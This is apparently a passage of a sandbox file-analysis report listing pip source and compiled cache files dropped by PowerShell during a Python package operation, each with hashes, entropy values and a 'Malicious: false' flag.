                              Preview:from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name..from pip._internal.req.constructors import install_req_drop_extras.from pip._internal.req.req_install import InstallRequirement..from .base import Candidate, CandidateLookup, Requirement, format_name...class ExplicitRequirement(Requirement):. def __init__(self, candidate: Candidate) -> None:. self.candidate = candidate.. def __str__(self) -> str:. return str(self.candidate).. def __repr__(self) -> str:. return f"{self.__class__.__name__}({self.candidate!r})".. @property. def project_name(self) -> NormalizedName:. # No need to canonicalize - the candidate did this. return self.candidate.project_name.. @property. def name(self) -> str:. # No need to canonicalize - the candidate did this. return self.candidate.name.. def format_for_error(self) -> str:. return self.candidate.forma
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):12592
                              Entropy (8bit):4.328792455404742
                              Encrypted:false
                              SSDEEP:192:gN0R+Ax5l1HPLlZ/pS9DBFYcIaJbY0FRB314LCLbo2s8T4EBdvMuhz:gN0R+cLpS1BRxXX1BbYm4ydku9
                              MD5:C966A718961B0E444857373050B09EE2
                              SHA1:1FD155FCFA0A1547F514E35C4013A1C214E64D6D
                              SHA-256:9CB24EB15304562DA0414549A1414A31901EBB67FB19132318CBCD496CB3D017
                              SHA-512:AAFC4B6926C19AD425864209D0BD84EC4B8DA84EFDD9C08E8607D83B06603950E030E9833618375C3CEC50895512563B9C912DDD0E06F5FE751049A29C062190
                              Malicious:false
                              Preview:import contextlib.import functools.import logging.import os.from typing import TYPE_CHECKING, Dict, List, Optional, Set, Tuple, cast..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.resolvelib import BaseReporter, ResolutionImpossible.from pip._vendor.resolvelib import Resolver as RLResolver.from pip._vendor.resolvelib.structs import DirectedGraph..from pip._internal.cache import WheelCache.from pip._internal.index.package_finder import PackageFinder.from pip._internal.operations.prepare import RequirementPreparer.from pip._internal.req.constructors import install_req_extend_extras.from pip._internal.req.req_install import InstallRequirement.from pip._internal.req.req_set import RequirementSet.from pip._internal.resolution.base import BaseResolver, InstallRequirementProvider.from pip._internal.resolution.resolvelib.provider import PipProvider.from pip._internal.resolution.resolvelib.reporter import (. PipDebuggingReporter,. PipReporter,.).from pip._inte
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):8378
                              Entropy (8bit):4.5483528725345925
                              Encrypted:false
                              SSDEEP:192:8A4VU/4+r8L9DC8PVjXC6gAiOlYNyT1mgC5tlyspvIIjN5U:8A4VU/PriPVjXC6xGT5tndnU
                              MD5:CA21C210EFA5760DB395D16076E1ABE5
                              SHA1:34B9904DA71D74F6EE47026974C5B4134789ABA4
                              SHA-256:B1AC502C1F14CC816D31272ABB2B46D744CE4EC61514943F9A45B5358FB8EB01
                              SHA-512:7F848DCFFF740A943A036D086571E0CD6979F08C293C92745770A40A5050343C3263ECD38E2E42EE16BEEA975A11BE6E0C8B0E61DEE8A7F35E207E3ED53E9A69
                              Malicious:false
                              Preview:import datetime.import functools.import hashlib.import json.import logging.import optparse.import os.path.import sys.from dataclasses import dataclass.from typing import Any, Callable, Dict, Optional..from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.rich.console import Group.from pip._vendor.rich.markup import escape.from pip._vendor.rich.text import Text..from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import get_default_environment.from pip._internal.metadata.base import DistributionVersion.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.network.session import PipSession.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.entrypoints import (. get_best_invocation_for_this_pip,. get_best_invocation_for_this_python,.).from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_ow
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):201
                              Entropy (8bit):4.778035309005675
                              Encrypted:false
                              SSDEEP:6:rH/cl/VneGn23d6oAreKAyQ6Iaatgem/l:T0tVevImbyQjaatHmt
                              MD5:57097DACE699F4CDF780788248A86D50
                              SHA1:CDD4966273B88EDFE08DB5206ADF3B1F4662A0C6
                              SHA-256:6F400A0DEAB7D8CAE2CDE39B84CED9B4A730B286C2E490EED8CEBB9156B47A98
                              SHA-512:F1998CC157566AF635F46AE13C9EC5527FB31009E6F3E049796E6AB7B7D064BA2E194492C3D59238D1DA6BA330610A8535B22B96FFD088635DF7B5889863BCB3
                              Malicious:false
                              Preview:........=.Cf................................y.).N..r..........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/__init__.py..<module>r........s.........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4542
                              Entropy (8bit):5.611527483242487
                              Encrypted:false
                              SSDEEP:96:2BlPQNssZQHToFiaOMlmD5mSLczvHHlHm4s/jw/1iPY:2B+QHTIiPVLchG4sM1iPY
                              MD5:6A752BF861C820AC9B48A158F36EDFE5
                              SHA1:81E9BE1CE553FAD897E0E492FA3B94D2B7684B87
                              SHA-256:4AD7E3E9B0701854BBE5E67956BEFCD1031E2D40FE12C75C81AF09837F69DBDF
                              SHA-512:A3E84861AC8AB7A2811046963C33A6B92085B251B24990443748D5B63F08CA667265F6D19BC02CB06D4DC796BE98A42B367F7B6682460C5769A073DE900D9180
                              Malicious:false
                              Preview:........=.Cf..........................|.....d.Z.d.d.l.Z.d.d.l.Z.d...Z.e.j...................d...........Z.e.j...................e.........d...........Z.d...Z.d...Z.y.).a....Functions brought over from jaraco.text...These functions are not supposed to be used within `pip._internal`. These are.helper functions brought over from `jaraco.text` to enable vendoring newer.copies of `pkg_resources` without having to vendor `jaraco.text` and its entire.dependency cone; something that our vendoring setup is not currently capable of.handling...License reproduced from original source below:..Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1872
                              Entropy (8bit):5.215609435001079
                              Encrypted:false
                              SSDEEP:24:pcIe2uK6/KNOiVJBv8lj/UoF3jbYkxOR4v/kG42XZ/b9lRGXXhuVO/wClJQwr:pVe2TqKbDi/nzkkq49NxbHCxtF7Qwr
                              MD5:0B1D6DE347D89A1A601939117D4564BA
                              SHA1:DFD3E17B2BB8E7CA7C9CD7FDBB2618AC61D304D0
                              SHA-256:A1064CD1CC3EE368BFEAE64672D6104EFB2A8B379182C5FB44F9184375200F2B
                              SHA-512:76AF580F09262DA0F76E92ED08F14D22E4D24CA72DB3CE20F5C8EDEF3EDE299F22A5E3C9653E5419C72B714A717DA661FB62F582F7A6167555241FAFA446AFD9
                              Malicious:false
                              Preview:........=.Cf..........................f.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z...G.d...d.e.j...........................Z.d.e.d.e.f.d...Z.d.d...Z.y.).z.Customize logging..Defines custom logger class for the `logger.verbose(...)` method...init_logging() must be called before any other modules that call logging.getLogger.......N)...Any..cast.....c.....................(.....e.Z.d.Z.d.Z.d.e.d.e.d.e.d.d.f.d...Z.y.)...VerboseLoggerzXCustom Logger, defining a verbose log-level.. VERBOSE is between INFO and DEBUG.. ..msg..args..kwargs..returnNc.....................8.......|.j...................t.........|.g.|.....i.|.....S.).N)...log..VERBOSE)...selfr....r....r....s.... .dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/_log.py..verbosez.VerboseLogger.verbose....s..........t.x.x......6.t..6.v..6..6.....)...__name__..__module__..__qualname__..__doc__..strr....r......r....r....r....r........s(..............7.3....7.s....7.c....7.d....7r....r......
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2416
                              Entropy (8bit):5.091136390707263
                              Encrypted:false
                              SSDEEP:48:khCwnB0TGH38HgNC25maQ+vl+rylM96ibl9sEtjwjDjF81X:rw32gg2D0rqUjlwrF89
                              MD5:96FFC01D282045F6F1E1BE5925C1F3F6
                              SHA1:D22D59B2A371CEA668DF27A5A94C2FAB0D1CA259
                              SHA-256:AECB3F33E48EFE265B0C64AD305127176971D7B231B27EFB1E528F334BC0A40C
                              SHA-512:269FDAD6AF56EF51C6D4E6705085F2AE64D4682F9A4B8B15A6EA26E0E4334378409DC97FA02A865489074A221BA8550195B6D827C3A6F86F973A3632D46B435D
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.d.d.e.d.e.d.e.f.d...Z.d.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.).z..This code wraps the vendored appdirs module to so the return values are.compatible for the current pip code base...The intention is to rewrite current usages gradually, keeping the tests pass,.and eventually drop this after all usages are changed.......N)...List)...platformdirs..appname..returnc.....................0.....t.........j...................|.d...........S.).NF)...appauthor)..._appdirs..user_cache_dir).r....s.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/appdirs.pyr....r........s..........."..".7.e..<..<.......roamingc...........................t.........j...................|.d.|...........}.t.........j...................j...................|.........r.|.S.d.}.|.r t.........j...................j...................|.|.........}.t.........j............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2219
                              Entropy (8bit):5.382442736475346
                              Encrypted:false
                              SSDEEP:48:FnzFvqkHP66dm9HGIX8SySMmFW/2XHUx2:FzFvpHy6otG+sSMk4g
                              MD5:7C159DD8CC4828D43CC0F41C877CAE85
                              SHA1:41300D7E15AB0EF8DA287F4C694F3F6D1DBB0132
                              SHA-256:03EDAD7229E989A104B05B1F5C5EEB7DCF30E3E2A3042C419226C427F579ED60
                              SHA-512:CDEA131E3805D3E527D2A63AC0B8992B22DEBE7984BF6AE00A0885B678C7BB79E8043629F43A4884813EB6BB00F327CA0C25BC3563BF6A8BFFEDAD79AE9B06C9
                              Malicious:false
                              Preview:........=.Cf\...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z...e.j...................e.........Z.d.e.f.d...Z.d.e.d.e.f.d...Z.h.d...Z.e.j...................j...................d.........x.s ..e.j...................d.k(..x.r...e.j ..................d.k(..Z.y.).zKStuff that differs in different Python versions and platform.distributions......N)...get_path_uid..stdlib_pkgs..WINDOWS..returnc.....................<.......d.d.l.}.y.#.t.........$.r...Y.n.w.x.Y.w.d.d.l.m.}...|.S.).Nr....T)...IS_PYOPENSSL)..._ssl..ImportError..pip._vendor.urllib3.utilr....).r....r....s.... .fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/compat.py..has_tlsr........s*......................................6......s..................pathc..........................t.........t.........d.........rkt.........j...................|.t.........j...................t.........j...................z...........}.t.........j...................|.........j............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5567
                              Entropy (8bit):5.558385879923258
                              Encrypted:false
                              SSDEEP:96:YkSlZqxsEQLlOTO8E0pFBlfYs4PGOkI/c9XYwTV8KDglzCVD1:YdlkOp+O8E0pjBYCj8ceweKDkm1
                              MD5:1E810D28A7917F0ED56178315BD64EA3
                              SHA1:B5931506952214886C2C16C8989B9C71BCF128B7
                              SHA-256:8EFB6287EB01FDE035356CE6F52B478614FF8B21C0844FB2367A5CAFDC8204AB
                              SHA-512:C247EC5346BFFBFC2699818A66FD21B96CA820A4575BB29F7122ACE884FD89E44D2CC8E9F0CDFB98092F5507A2225B30D5D6EE808F6D2FFF43EEC2B4A604526C
                              Malicious:false
                              Preview:........=.Cf..........................x.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j...................d.........Z.d.e.e.d.f.....d.e.f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.e.e.........d.e.e.e.........f.d...Z.d.e.d.e.f.d...Z...d.d.e.e.....d.e.e.....d.e.f.d...Z.........d.d.e.e.....d.e.e.e.........d.e.e.....d.e.e.e.........d.e.e.....f.d...Z.y.).z3Generate and work with PEP 425 Compatibility Tags.......N)...List..Optional..Tuple)...PythonVersion..Tag..compatible_tags..cpython_tags..generic_tags..interpreter_name..interpreter_version..mac_platformsz.(.+)_(\d+)_(\d+)_(.+)..version_info...returnc.....................F.....d.j...................t.........t.........|.d.d...................S.).N.......)...join..map..str).r....s.... .rC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/compatibility_tags.py..version_info_to_nodotr........s..........7.7.3.s.L...!..,..-.............a
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):690
                              Entropy (8bit):5.11299985346228
                              Encrypted:false
                              SSDEEP:12:GHSB1aw8/Mdhg7OXeEImbskqusF2pOYmPB0X+johDyU:GH4aXUdAOuE3N4MEYmmX+chd
                              MD5:11194453F03E3820F726DFE8772EF444
                              SHA1:0E5BA0D2E72589F2E12DF0162313926D2D412D77
                              SHA-256:18366E3E5462352A39EFDD9E9D2D175ADC72C885277FA5264E07234E95164E59
                              SHA-512:24AEAC90E3C88C6E5A3C22FE9C2108A7DA330C8EAB513346C078231F4936665BD215E62F47763120124CA7400FA216A2B51B340E348900206A7D566B94C1D61A
                              Malicious:false
                              Preview:........=.Cf..........................(.....d.Z.d.d.l.Z.d.e.d.e.d.e.d.e.f.d...Z.y.).z.For when pip wants to check the date or time.......N..year..month..day..returnc.....................v.....t.........j...................j...........................}.t.........j...................|.|.|.........}.|.|.kD..S.).N)...datetime..date..today).r....r....r....r......givens.... .hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/datetime.py..today_is_later_thanr........s0.........M.M........!.E....M.M.$...s..+.E....5.=........)...__doc__r......int..boolr......r....r......<module>r........s0........................c......#......C......D.....r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4192
                              Entropy (8bit):5.605151830916841
                              Encrypted:false
                              SSDEEP:96:8IziDC7ITvgezuOCykDPEMUor6fmZVhnyxnJ1:8IGDCETv7zuOlctpVIxn/
                              MD5:1F23C07D635DA77B0DEC1AF07C964D27
                              SHA1:DCD465264EE9F07124A2F6A9DA8C50DDCEEFB608
                              SHA-256:2E9969F3400C8905AD20B02B6B93CD7FE60F311F775F529AA43337637DD93864
                              SHA-512:36594571BAB4FBDAB47B692BE03E40DF2FEA94A1EFBC166D6B6F3EA6828795B4B1FAE650AECC35C40C682567C9934F49BAB9487189C4C8D1C6B4B064E4BC098F
                              Malicious:false
                              Preview:........=.Cf+...............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...G.d...d.e.........Z.d.a.e.e.d.<.......d.d.e.e.e.f.....d.e.e.....d.e.d.e.d.e.e.....d.e.e.....d.d.f.d...Z.d.d...Z.d.d.d...d.e.d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.d.f.d...Z.y.).zN.A module that implements tooling to enable easy warnings about deprecations.......N)...Any..Optional..TextIO..Type..Union)...parse)...__version__z.DEPRECATION: c...........................e.Z.d.Z.y.)...PipDeprecationWarningN)...__name__..__module__..__qualname__........kC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/deprecation.pyr....r........s.........r....r......_original_showwarning..message..category..filename..lineno..file..line..returnc...........................|...t...........t.........|.|.|.|.|.|...........y.y.t.........|.t.................r't.........j...................d.........}.|.j...................|...........y.t.........|
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3569
                              Entropy (8bit):5.074020783674989
                              Encrypted:false
                              SSDEEP:48:qinuZGc9ngI/x3+6x+Oj1SCsAWvLMuDUA2awcFTzLVcXPplO3J7o72BJ:qYuN9n2zvNUfcFTzBcXPyN
                              MD5:92E4D94786A85172E57AF0A333E49EA7
                              SHA1:80C6679E95524B9EDBA83C594F75FD7314544671
                              SHA-256:CB52DA676DB6D813F34C21DDD8F2623BA342D552E40B14D4A84B60946A9DA950
                              SHA-512:3F89BA7410D5E2E9220A0F0660A3922640AAE4C1E9DFF62A8E8921F0792B7476A62DEAC20C2D8D860F2E64795F2FB7C78EC469E98E31C273671A5AF4A52C7594
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z...d.d.e.d.e.e.....d.e.d.e.f.d...Z.y.)......)...Optional)...ArchiveInfo..DirectUrl..DirInfo..VcsInfo)...Link)...path_to_url)...vcs..direct_url..name..returnc..........................|.j.............................|.d.z...}.g.}.t.........|.j...................t.................rI|.d.j...................|.j...................j...................|.j...................|.j...................j...........................z...}.n.t.........|.j...................t.................rK|.|.j...................z...}.|.j...................j...................rQ|.j...................|.j...................j.............................n+t.........|.j...................t.................s.J...|.|.j...................z...}.|.j...................r.|.j...................d.|.j...................z.............|.r.|.d.d.j...................|.........z...z...}
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3232
                              Entropy (8bit):5.365752749742813
                              Encrypted:false
                              SSDEEP:48:UFGJ0OKVQtwrNSyKsOENPjIrQI4dMfqtpCY2/GBn/7Keutbj:UQJ0OKVQtwr7IrQI4dFS9
                              MD5:86A17B3D6D72A8EEEE5F441A78046507
                              SHA1:BD213B494CAFBBEB840B6E1768E4FD715BA06BD8
                              SHA-256:B1E0F74D4F78110744F96D3ACE9F6FB0D477E1C66D3F8678FE184855547F5E07
                              SHA-512:495692E05860D94BB184022161ED45D0B6DA857C0AC9A059862B3867A89779598ACBED593631B04F809ED40A5E27C549A3F87006256F7722624A37BD4984DA6A
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.g.Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional)...site_packages..user_site)...running_under_virtualenv..virtualenv_no_global..egg_link_path_from_sys_path..egg_link_path_from_location..raw_name..returnc.....................@.....t.........j...................d.d.|.........d.z...|...d...g.S.).a..... Convert a Name metadata value to a .egg-link name, by applying. the same substitution as pkg_resources's safe_name function.. Note: we cannot use canonicalize_name because it has a different logic... We also look for the raw name (without normalization) as setuptools 69 changed. the way it names .egg-link files (https://github.com/pypa/setuptools/issues/4167).. z.[^A-Za-z0-9.]+..-z..egg-link)...re..sub).r....s.... .hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/util
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2164
                              Entropy (8bit):5.413958763953937
                              Encrypted:false
                              SSDEEP:24:Gm0x6hnllixcTsnqCGg3N3tF5wSy0/RkG8HuYPRE31EwpaXSzatlJy0HaTyJAKgp:50qTUq8hp80+7ZEESzc7iTyJAVo8oNI
                              MD5:8710016EFD4C6074412454E83E1FDD85
                              SHA1:4EF609C39A94A740830F71B1A599F6D4A819A708
                              SHA-256:3F3B49B9C5F17D8F9204EDEA03E8E6556FDC5E0D9480F9D4FF6AD2218644D72D
                              SHA-512:F8010059D0D7A6BC77864AE2D6794D0E352D5EDC4A35A891040AE80ADD03E0BA53A3B61AB57C1AE7182F0B8160C45201004D797F1483454539DBCD3F555A5AE5
                              Malicious:false
                              Preview:........=.Cf..........................>.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.g.Z.e.e.e.e.f.........e.d.<.....e.j$..................d.........Z.d.e.d.e.f.d...Z.y.)......N)...List..Tuplez.utf-8z.utf-16z.utf-16-bez.utf-16-lez.utf-32z.utf-32-bez.utf-32-le..BOMSs....coding[:=]\s*([-\w.]+)..data..returnc...........................t.........D.]5..\...}.}.|.j...................|.........s...|.t.........|.........d...j...................|.........c...S...|.j...................d.........d.d...D.]n..}.|.d.d...d.k(..s...t.........j...................|.........s.."t.........j...................|.........}.|...J...|.j...........................d.....j...................d.........}.|.j...................|.........c...S...|.j...................t.........j...................d.........x.s...t.........j......
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3999
                              Entropy (8bit):5.25375481750227
                              Encrypted:false
                              SSDEEP:48:riOLnhA/35jkXM50vKdOisrKJYz/DixquLg7GR5OFby4MMpoyOCi5h72MhElj9G+:FyKXM5avi5qDicQIGnOFbOaolSh
                              MD5:48A931CF37ED96EF1154ABEDBCF23209
                              SHA1:EE096D7F2DA35D3B390370D0554DF1CD4A6A4328
                              SHA-256:309BA339BEA69EB9A57C0D841A123889EAC74D6D36D9735457A12378D76682A0
                              SHA-512:4AF6107C95C4E79AC16532CE1A4F2AFCF06459F10F0673E7A6FCFB8CB220F0972FD9ADED570C884524C90E5F98DB7578F8B23DA8E06DDA1862748043BA5D2F5B
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.e.j...................j.......................d.e.j...................j.....................d.e.j...................j.......................g.Z.e.r4d.d.h.Z...e.j ..................e.e.........D...c.g.c.]...}.d.j#..................|...............c.}.Z.d.d.e.e.e.........d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.y.c...c.}.w.)......N)...List..Optional)...main)...WINDOWS..pip.....z..exe..args..returnc.....................V.....t.........j...................j...................d...........t.........|.........S.).a....Central wrapper for all old entrypoints... Historically pip has had several entrypoints defined. Because of issues. arising from PATH, sys.path, multiple Pythons, their interactions, and most. of them having a pip installed, users suffer every time an entrypoint gets. moved... To alleviate this pain, and provide a mechanism for warning users and. d
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7464
                              Entropy (8bit):5.183379975729717
                              Encrypted:false
                              SSDEEP:192:zfwtbIFxjgsAmlw4tqh7HlIkkdQgfpak9Uk0Q:mbIb0sCk87HD21Qk910Q
                              MD5:2C1B28A503ABB98C411642A657F355B2
                              SHA1:ACF1FA2E23955B17DC2AA973F9A18F174648C104
                              SHA-256:DD4E5EA1ACA667249ABBF90AACA4E4D03846B5CB72C05FBAA2A3D7C128B7A5B1
                              SHA-512:0E148066E7B0845F60FA507F22BD48FC1FD3BA60340185F3934968A618D1D7CC9E1EC8000B7A04520DFAE50A9EC7F3E1FB64333877C71701082EF1D257AB1C0F
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.e.d.e.d.e.d.e.e.d.d.f.....f.d...........Z...e.d...e.d...........e.d...................Z...e.e.j:..........................Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.e.....f.d...Z d.e.d.e.e!e"f.....f.d...Z#d.e.d.e.f.d...Z$d.e.d.e.e!e"f.....f.d...Z%d.e.d.e.f.d...Z&y.)......N)...contextmanager)...NamedTemporaryFile)...Any..BinaryIO..Generator..List..Union..cast)...retry..stop_after_delay..wait_fixed)...get_path_uid)...format_size..path..returnc...........................t.........j...................d.k(..s.t.........t.........d.........s.y.t.........j...................j...................|.........s.J...d.}.|.|.k7..r.t.........j...................j...................|.........rLt.........j...........................d.k(..r...t.........|.........}.|.d.k(..S.t.........j...................|
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1170
                              Entropy (8bit):5.810045923269114
                              Encrypted:false
                              SSDEEP:24:9hCO/Kk2VfU9VPNLilefcNG8WbqmJ3uOc1wlMHMqk2vS15f:zCQKkgOJZouG+xYwJ5aGh
                              MD5:D1CB9629B3716001CD84E1F071A4E59E
                              SHA1:810FB22681AC3CF537510C2EC08D929469B1E7F7
                              SHA-256:D2334649EA49E7D1EAA0BDCD43A44B0657FB5669DA23D4767D94A20DF32061CE
                              SHA-512:B966595098F42E387B8F73DE2502E5FCE3255C3C9125207989F41C09B185356256E66B806EC7D7832FAA18DDD9F4AEA8C939B4816A0A278B302A910D321A6773
                              Malicious:false
                              Preview:........=.Cf...............................U.d.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.d.f.....e.d.<...d.Z.e.e.d.f.....e.d.<...d.e.f.Z.e.e.d.f.....e.d.<...d.Z.e.e.d.f.....e.d.<...e.e.z...e.z...e.z...Z.d.e.d.e.f.d...Z.y.).z.Filetype information.......)...Tuple)...splitextz..whl).z..tar.bz2z..tbz...BZ2_EXTENSIONS).z..tar.xzz..txzz..tlzz..tar.lzz..tar.lzma..XZ_EXTENSIONSz..zip..ZIP_EXTENSIONS).z..tar.gzz..tgzz..tar..TAR_EXTENSIONS..name..returnc.....................N.....t.........|.........d.....j...........................}.|.t.........v.r.y.y.).z9Return True if `name` is a considered as an archive file......TF).r......lower..ARCHIVE_EXTENSIONS).r......exts.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/filetypes.py..is_archive_filer........s(.........4.........!..!..#.C..... .. ...........N)...__doc__..typingr......pip._internal.utils.miscr......WHEEL_EXTENSIONr......str..__annotations__r....r....r....r......boolr......r....r......<mo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2348
                              Entropy (8bit):5.455268771775506
                              Encrypted:false
                              SSDEEP:48:tDB8HlSeOhTKlbrpDn80iFwmaJIGaKu3AYoyko/VKy/cWyw7ihE:RB8FiWDn8r10bNYrF/VKCcxNm
                              MD5:BC3B1C94839B41D950C16C7DEA6FC185
                              SHA1:F09D8D5E98ABA3CDAB34FC4D823A0D0B8457334D
                              SHA-256:2C179A98C6F990F7C4967DCF94CD4CA95DD7DE992C1E591A67C43C520B51EE7E
                              SHA-512:A6A4F8B9A6DD71F92D0C6FBFD0CF836DFB5EF69598DB9CAD147A5A8C96774423DEBF6B6BCC5A24110CA38126265A7CD1B80B77BAEBF81F7EA2AD3272CD491820
                              Malicious:false
                              Preview:........=.Cf).........................p.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.e.e.f.....f.d...Z.y.)......N)...Optional..Tuple..returnc...........................t.................x.s...t.................S.).z9Returns glibc version string, or None if not using glibc.)...glibc_version_string_confstr..glibc_version_string_ctypes........eC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/glibc.py..glibc_version_stringr........s........'..)..J.-H.-J..Jr....c..........................t.........j...................d.k(..r.y...t.........j...................d.........}.|...y.|.j...........................\...}.}.|.S.#.t.........t.........t.........f.$.r...Y.y.w.x.Y.w.).z@Primary implementation of glibc_version_string using os.confstr...win32N..CS_GNU_LIBC_VERSION)...sys..platform..os..confstr..split..AttributeError..OSError..ValueError)...gnu_libc_version.._..versions.... r....r....r........se..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7560
                              Entropy (8bit):5.332672003633298
                              Encrypted:false
                              SSDEEP:192:3Wh8frurxRItcXeGhIX0Htp8jzYcd75dyDPKct:3W6jGRI55X5NdHZct
                              MD5:FBA4627B04E4240FD15F94DACF841CAB
                              SHA1:20532FD9A718EED3C6FCE30869FA400062EBF62E
                              SHA-256:92DC0FFCA46E4E4318DE2180F1142E2FBDECB0A0BA9F7AB74C1CAD817249E6ED
                              SHA-512:C4E3CC72242A1905034F9661975D98E981ADD4A53ACD25172F09D6C531B595592AA13B4C7CAC29136838FFF6F5A141178C40F57C3B379640586BC0826E43E121
                              Malicious:false
